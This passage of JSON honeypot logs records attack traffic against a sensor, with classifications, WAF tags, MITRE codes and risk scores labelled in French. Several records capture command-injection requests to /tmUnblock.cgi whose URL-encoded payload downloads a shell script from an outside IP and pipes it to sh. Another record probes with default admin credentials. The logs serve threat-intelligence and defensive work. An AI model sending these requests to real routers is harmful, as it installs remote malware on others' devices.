\u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00221686779d1954268b7681fbc44041feb5c1ebb424\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":287},{"id":11809349,"ip":"45.153.34.219","ts":"2026-07-14 02:18:12.000000","proto":"tcp","src_port":55152,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/tmUnblock.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00226cff281bfb0055f2e5c6afc1d923500419949544\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 384, \u0022payload_entropy\u0022: 5.3129103482985975, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022fdea675a9e9cfa4a884b573eb6859264ce6c6ab9\u0022, \u0022event_fingerprint\u0022: \u0022ce7c9e1da86e6b62212b8131b65e1bc88191d005\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022567dbd049a3cbd83ed1281fbc2f38d08\u0022, \u0022path_pattern_hash\u0022: \u002240d64e5af66418a51c5ae33f5e8eb67d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnect\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnection: close\\r\\n\\r\\nttcp_num=3\u0026ttcp_size=3\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblkv%3Bbu\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnect\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnection: close\\r\\n\\r\\nttcp_num=3\u0026ttcp_size=3\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblkv%3Bbu\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnect\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022f185e3c4bc0994a3c9e70108dc1511b46945f7eb\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnect\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnect\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":384},{"id":11809350,"ip":"45.153.34.219","ts":"2026-07-14 02:18:12.000000","proto":"tcp","src_port":55168,"dst_port":82,"service":"http","classification":"web_probe","waf_score":3,"waf_tags":"[\u0022950734:sap-sapcontrol-path\u0022]","http_method":"GET","http_target":"\/","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 3, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 0, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u002242099b4af021e53fd8fd4e056c2568d7c2e3ffa8\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 97, \u0022payload_entropy\u0022: 5.004364842491166, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 20.0, \u0022risk_classification\u0022: 38.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 15.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 4.6, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 15.0}, \u0022risk_score\u0022: 40, \u0022tag_count\u0022: 4, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002276beda730817346b41ffb60ac438dceac4ccc95e\u0022, \u0022event_fingerprint\u0022: \u002259834c412e06e103c78af6cbff7f1fe99538c3ab\u0022, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022cc86476094a0de4b714f02995d8fce36\u0022, \u0022path_pattern_hash\u0022: \u00228a5edab282632443219e051e4ade2d1d\u0022}, \u0022service_name\u0022: \u0022http\u0022, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 40}, \u0022payload_preview\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/\u0022, \u0022waf_tags\u0022: [\u0022950734:sap-sapcontrol-path\u0022], \u0022waf_rule_names\u0022: [\u0022sap-sapcontrol-path\u0022], \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/\u0022, \u0022waf_tags\u0022: [\u0022950734:sap-sapcontrol-path\u0022], \u0022waf_rule_names\u0022: [\u0022sap-sapcontrol-path\u0022], \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 77%\u0022}, \u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 77%\u0022, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 15.0, \u0022risk_score\u0022: 40}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022mitre_tactics\u0022: [\u0022TA0007\u0022, \u0022TA0001\u0022], \u0022mitre\u0022: \u0022TA0007\u0022, \u0022threat_family\u0022: [\u0022scanner\u0022], \u0022confidence\u0022: 0.77, \u0022classification_confidence\u0022: 0.77, \u0022recommended_client_action\u0022: \u0022monitor\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00228eac4360e38e77faae54842a4993414973e6b832\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/\u0022, \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022attack_vector\u0022: \u0022Sonde HTTP \u00b7 via HTTP:82 \u00b7 (sonde \/ probe)\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 77 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, 